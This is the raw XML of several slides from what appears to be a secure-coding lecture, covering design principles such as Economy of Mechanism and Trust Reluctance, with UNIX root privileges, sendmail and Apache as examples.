            <a:ext cx="380901" cy="391058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84730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10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7850" y="3145356"/>
            <a:ext cx="5752237" cy="64283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49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7292"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="12188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5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Common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Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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Economy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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="5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–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Security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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267122"/>
            <a:ext cx="8652796" cy="3080218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Alias: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Occam's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Razor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15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tendency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developers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seek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clever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solutions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5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Complicated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code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leads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more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more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severe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defects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5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Complicated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mechanisms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more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likely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fail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Consequences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Simpl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mecha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li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ail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Simple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systems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has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fewer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defects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55252" y="4988915"/>
            <a:ext cx="4621596" cy="658958"/>
            <a:chOff x="6456934" y="4989321"/>
            <a:chExt cx="4622800" cy="659130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6463284" y="4995671"/>
              <a:ext cx="4610100" cy="646430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610100" h="646429">
                  <a:moveTo>
                    <a:pt x="4610100" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="646175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610100" y="646175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610100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6463284" y="4995671"/>
              <a:ext cx="4610100" cy="646430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610100" h="646429">
                  <a:moveTo>
                    <a:pt x="0" y="646175"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610100" y="646175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="646175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540320" y="5014816"/>
            <a:ext cx="3833766" cy="573891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marR="5078" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>change</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>culture</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-39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1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>simplicity?</a:t>
            </a:r>
            <a:endParaRPr sz="1799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827284" y="4539124"/>
            <a:ext cx="596110" cy="689430"/>
            <a:chOff x="10830104" y="4539413"/>
            <a:chExt cx="596265" cy="689610"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10836454" y="4686107"/>
              <a:ext cx="532130" cy="536575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="532129" h="536575">
                  <a:moveTo>
                    <a:pt x="277457" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="231990" y="2666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187636" y="13006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145433" y="30781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106420" y="55748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71633" y="87670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42112" y="126303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19840" y="169507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5877" y="214604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1983" y="306308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11605" y="350831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28640" y="393079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52866" y="432008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84059" y="466578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121995" y="495746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164540" y="517541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209101" y="530934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254635" y="536165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300099" y="533479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344453" y="523118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386653" y="505323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425658" y="480338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460426" y="448405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489914" y="409767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512223" y="366597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526216" y="321519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532115" y="275580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530147" y="229826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520537" y="185303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503507" y="143058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479285" y="104137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448093" y="69586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410158" y="40451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367579" y="18652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322999" y="5248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27745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836454" y="4686107"/>
              <a:ext cx="532130" cy="536575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="532129" h="536575">
                  <a:moveTo>
                    <a:pt x="42112" y="126303"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71633" y="87670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106420" y="55748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145433" y="30781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187636" y="13006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231990" y="2666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277457" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322999" y="5248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367579" y="18652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410158" y="40451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448093" y="69586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479285" y="104137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503507" y="143058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520537" y="185303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530147" y="229826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532115" y="275580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526216" y="321519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512223" y="366597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489914" y="409767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460426" y="448405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425658" y="480338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386653" y="505323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344453" y="523118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300099" y="533479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254635" y="536165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209101" y="530934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164540" y="517541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121995" y="495746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84059" y="466578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52866" y="432008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28640" y="393079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11605" y="350831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1983" y="306308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5877" y="214604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19840" y="169507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42112" y="126303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2752" y="4810615"/>
              <a:ext cx="112307" cy="1123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7877" y="4903071"/>
              <a:ext cx="313338" cy="2003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81409" y="4584018"/>
              <a:ext cx="224995" cy="17197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000109" y="4539413"/>
              <a:ext cx="426084" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="426084" h="117475">
                  <a:moveTo>
                    <a:pt x="214761" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="11577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235737" y="116977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425939" y="95917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147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914126"/>
              <a:endParaRPr sz="1799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65402" y="4559620"/>
              <a:ext cx="333155" cy="202378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50</a:t>
            </a:fld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51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639013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0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10" dirty="0"/>
              <a:t>Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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267123"/>
            <a:ext cx="10360501" cy="3566500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Evaluate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mechanisms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attempt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simplify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Seek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simple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solutions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complex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problems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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="83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later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 process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solutions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problems are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created,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the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more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complicated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they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will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tend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48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Avoid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complex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configuration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processes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Users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will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make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mistakes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bother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implement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all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Avoid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verbose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documentation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Users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won'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 it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Give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them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checklists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step-by-step</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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processes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references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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2639427"/>
            <a:ext cx="3470641" cy="2737472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="35551" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Design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6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Establish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Boundaries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6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Don't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Reinvent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Wheel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7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Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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Mechanism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55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40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Reluctance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55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Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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Design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7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Minimize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Attack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Surface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55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Weakest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Link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639013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0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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t>Reluctance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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10188461" cy="3207819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Principle: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Privileges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should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granted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based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single condition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Corollary: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Requiring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multiple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components</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="6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agree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before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granted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resource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more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requiring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only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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="83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simple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example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is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need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two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signatures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order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check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accepted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48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objective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principle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 to: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Prevent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breach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component</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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leading to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breach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others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870324" marR="769389" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>e.g.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Using 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Forceful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Browsing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reach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file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should not lead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to that file being </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-6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executed;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authorization of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user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verified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30682" y="6450406"/>
            <a:ext cx="141568" cy="151284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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>36</a:t>
            </a:r>
            <a:endParaRPr sz="900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0615" y="4583392"/>
            <a:ext cx="1536570" cy="152105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648757" y="6410183"/>
            <a:ext cx="5250082" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Images</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="3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courtesy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="5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of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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>:http://w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w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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>w3.nd.edu/~dlindley/handouts/Do%2520Not%2520Trust%2520Me.JPG</a:t>
            </a:r>
            <a:endParaRPr sz="100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742" y="367320"/>
            <a:ext cx="10512862" cy="818302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10515600" h="818515">
                <a:moveTo>
                  <a:pt x="0" y="818388"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10515600" y="818388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10515600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="818388"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25908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pPr defTabSz="914126"/>
            <a:endParaRPr sz="179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699" y="380397"/>
            <a:ext cx="4800620" cy="749105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="55230" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" marR="5078">
              <a:lnSpc>
                <a:spcPts val="2699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t>Reluctance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2499"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916700" y="1312640"/>
            <a:ext cx="6635292" cy="3662996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Monolithic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software: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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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conceptually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more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complex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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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Has more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defects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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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harder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maintain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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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more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expensive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test/deploy/update/patch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Consider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 distributed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system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using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services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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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File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mgmt.,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Mail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handling,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interface,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db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access,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…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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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Faster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create/build/deploy/patch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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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Easier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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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Easier to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update/patch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23364" y="6410182"/>
            <a:ext cx="5956653" cy="330114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38089" marR="30471" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Images</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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courtesy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="4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of:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://stanfordhospital.org/clinicsmedServices/COE/neuro/braintumor/images/brain-m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1350" spc="-22" baseline="-12345" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>37</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ap.jpg </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://pubs.usgs.gov/gip/dynamic/graphics/monolith.gif</a:t>
            </a:r>
            <a:endParaRPr sz="1000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64839" y="3771811"/>
            <a:ext cx="3685595" cy="219246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31210" y="1056750"/>
            <a:ext cx="1761285" cy="259012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639013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0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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t>Reluctance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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10157989" cy="4320050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Classic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example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bad compartmentalization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UNIX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privilege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model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Security-critical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operations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work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“all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nothing”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basis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206948" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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root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privileges,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anything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want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otherwise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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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limited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9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instance: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can’t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bind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ports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under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1024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without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root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order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bind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port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25,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sendmail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needs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run as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root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has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many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exploits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past!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Improvements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would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Allow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low-numbered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ports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based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group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so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non-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root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process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could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open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 port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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="84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Apache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Web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Server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models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uses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port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80, but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runs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server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processes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as an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unprivileged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user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30682" y="6450406"/>
            <a:ext cx="141568" cy="151284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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
